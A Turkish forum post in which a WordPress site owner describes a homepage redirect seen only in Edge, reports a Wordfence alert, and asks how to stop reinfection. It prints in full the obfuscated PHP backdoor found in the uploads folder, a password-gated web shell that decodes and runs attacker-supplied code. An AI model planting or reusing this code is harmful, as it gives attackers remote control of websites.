Selamın AleykümMerhaba Arkadaşlar Şimdiden Hayırlı Bayramlar.
Aktif olarak kullanılan, güzel satış yapan kendi kurduğum bir sitemiz mevcut,
Dip Not: İmzamda yer alan site değil.
birgün haber geldi site anasayfa farklı bir siteye yönleniyor,
siteyi
firefox tarayıcıdan açtım sıkıntı yok, telefondan
chrome ile açtım yine sorun yok, tekrar bilgisayardan
microsoft edge ile açtım site açıldıktan sonra farklı siteye yönlendi.
kurcaladım ama birşey bulamadım, eklentileri kaldırdım yine olmadı, temaya baktım keza aynı, bende
wp-content ve wp-config.php haricinde herşeyi sildim yeniden yükledim,
site sorunsuz görünüyordu, siteye bugün
wordfence kurup bir tarama yaptım,
upload klasörü içine index.php atmışlar
base64 ile şifrelenen bir dosya ve ben o dosyayı şimdi sildim.
sanırım bir açık var ve açık şuan kullandığımız en son sürümde devam ediyorsa aynı işlemin tekrardan olması muhtemel, sitede kesinlikle
marez tema ve eklenti yok,
marez tema ve eklenti kullandığım bir sitem var onda kesinlikle sorun yok ve aynı sunucuyu kullanıyorum.
başına gelen varmı? varsa wordfence haricinde nasıl bir tedbir aldı.
Kolay Gelsin
wordfence verdiği uyarı yazısı
- Filename: wp-content/uploads/index.php
- File Type: Not a core, theme, or plugin file from wordpress.org.
- Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <?php $b1 = "b"."ase"."64"."_d"."ec"."ode"; $kl = "
The issue type is: Obfuscated:PHP/base64decode.10972
Description: Obfuscation of a function call.
upload klasörü içine atılan index.php içindeki kod.
<?php $b1 = "b"."ase"."64"."_d"."ec"."ode"; $kl = "arr"."ay_merge"; $k1 = $kl($_POST,$_COOKIE,@$_REQUEST); if(isset($k1['lt']) && md5($k1['lt']) == $b1("MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=") ) {$lt = $b1($k1['a']);file_put_contents(sys_get_temp_dir()."/tm",'<?php '.$lt);@include(sys_get_temp_dir()."/tm");@unlink(sys_get_temp_dir()."/tm");file_put_contents("tm",'<?php '.$lt);@include("tm");@unlink("tm");}else{echo $b1("c3lzdGVtZmlsZXNkb250dG91Y2g=");} ?>